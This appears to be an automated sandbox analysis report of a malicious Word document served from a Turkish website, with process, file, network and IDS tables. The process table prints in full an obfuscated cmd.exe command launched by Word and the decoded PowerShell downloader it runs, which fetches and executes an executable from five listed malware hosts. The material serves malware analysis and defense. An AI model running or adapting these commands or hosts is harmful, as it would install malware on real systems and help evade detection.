URL: | http://ismandanismanlik.com.tr/En_us/Clients/2018-12 |
Full analysis: | https://app.any.run/tasks/b1fcb473-46a0-479d-9668-72cda9065351 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 20:44:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | CD214DF8E6AE09982A3D24B5736339A8 |
SHA1: | 6DB6E804F2CB00B588D4864440FA9AE4CA34A95C |
SHA256: | 1F3DB1B7491BE1C962A13BF3D2E7500A5D7A7BF7322C265CC5A9F776274B22B1 |
SSDEEP: | 3:N1KXKEbIEuOLQRrLEzWKXi5n:CvbwOsRrLEhCn |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3344 | "C:\Program Files\Internet Explorer\iexplore.exe" -nohome | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3636 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3344 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2688 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\FILE-753468[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
316 | c:\WiTAWFc\ivFAjJD\mZGnokr\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | CmD /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3296 | powershell "$ifO='zwI';$MaG=new-object Net.WebClient;$IBL='http://sundownbodrum.com/J335NbN@http://www.roteirobrasil.com/wp-includes/XEBv3PdHgZ@http://rdabih.org/m7mnTYaIzL@http://zavgroup.net/11D6PwFu@http://stefanobaldini.net/DfSVLfsC6'.Split('@');$lCK='nWP';$SCK = '362';$FFY='mwV';$DQi=$env:temp+'\'+$SCK+'.exe';foreach($Cfn in $IBL){try{$MaG.DownloadFile($Cfn, $DQi);$cPU='bGT';If ((Get-Item $DQi).length -ge 80000) {Invoke-Item $DQi;$jGj='mwL';break;}}catch{}}$hzA='sTh';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3344 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3344 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3344 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF6C57312C6D3D464B.TMP | — | |
MD5:— | SHA256:— | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2D5A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2EA7F8C9-B086-4028-812A-4427129A0C7B.0\61BEE8E1.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3344 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF373EDDA9C6CB0DAC.TMP | — | |
MD5:— | SHA256:— | |||
3344 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{2B73E945-FFE1-11E8-BAD8-5254004A04AF}.dat | — | |
MD5:— | SHA256:— | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B09FE97.wmf | — | |
MD5:— | SHA256:— | |||
2688 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6338BBBD.wmf | — | |
MD5:— | SHA256:— | |||
3920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2EA7F8C9-B086-4028-812A-4427129A0C7B.0\~DF9A7263A11E846688.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3636 | iexplore.exe | GET | — | 94.73.148.18:80 | http://ismandanismanlik.com.tr/En_us/Clients/2018-12 | TR | — | — | malicious |
3296 | powershell.exe | GET | 301 | 94.138.199.5:80 | http://sundownbodrum.com/J335NbN | TR | html | 241 b | malicious |
3636 | iexplore.exe | GET | 200 | 94.73.148.18:80 | http://ismandanismanlik.com.tr/En_us/Clients/2018-12/ | TR | document | 57.9 Kb | malicious |
3296 | powershell.exe | GET | — | 94.138.199.5:80 | http://sundownbodrum.com/J335NbN/ | TR | — | — | malicious |
3344 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3344 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3636 | iexplore.exe | 94.73.148.18:80 | ismandanismanlik.com.tr | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
3296 | powershell.exe | 94.138.199.5:80 | sundownbodrum.com | IHS Telekomunikasyon Ltd | TR | malicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com |
| whitelisted |
ismandanismanlik.com.tr |
| malicious |
sundownbodrum.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3296 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3296 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |